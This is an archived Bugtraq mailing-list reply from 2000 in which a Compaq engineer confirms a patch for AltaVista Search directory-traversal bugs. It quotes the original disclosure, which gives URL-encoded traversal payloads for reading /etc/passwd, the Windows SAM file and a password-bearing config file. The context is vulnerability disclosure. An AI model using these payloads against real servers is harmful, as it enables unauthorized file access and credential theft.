[13309] in bugtraq
Re: Altavista followup
daemon@ATHENA.MIT.EDU (Roelandts, Guy)
Tue Jan 11 11:53:49 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-Id: <6B180991CB19D31183E40000F86AF80E56DB76@broexc2.bro.dec.com>
Date: Tue, 11 Jan 2000 07:54:38 -0000
Reply-To: "Roelandts, Guy" <Guy.Roelandts@COMPAQ.COM>
From: "Roelandts, Guy" <Guy.Roelandts@COMPAQ.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Hi Rudi,
Just tried to reproduce the bugs you were talking about, and I can
confirm that they exist without their secpatch and that they are gone
after having installed the secpatch.
Guy ROELANDTS
Compaq EMEA
> -----Original Message-----
> From: rudi carell [mailto:rudicarell@HOTMAIL.COM]
> Sent: Sunday, January 09, 2000 4:37 PM
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: Altavista followup
>
>
> hola,
>
> more bugs in the AV-Search thing ..
>
> using uri-encoded strings it is possible to view "any" file
> on the system ..
>
> examples:
>
> unixxxsss ...
>
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/
etc/passwd
or on an micro$oft IIS ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\r
epair\\sam._
interesting infos about the file structure ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/inde
xer.log
or another file which does contain the password ..
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/poli
cy.conf
altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.
whatever ....
nicedays :-/
RC
rudicarell@hotmail.com
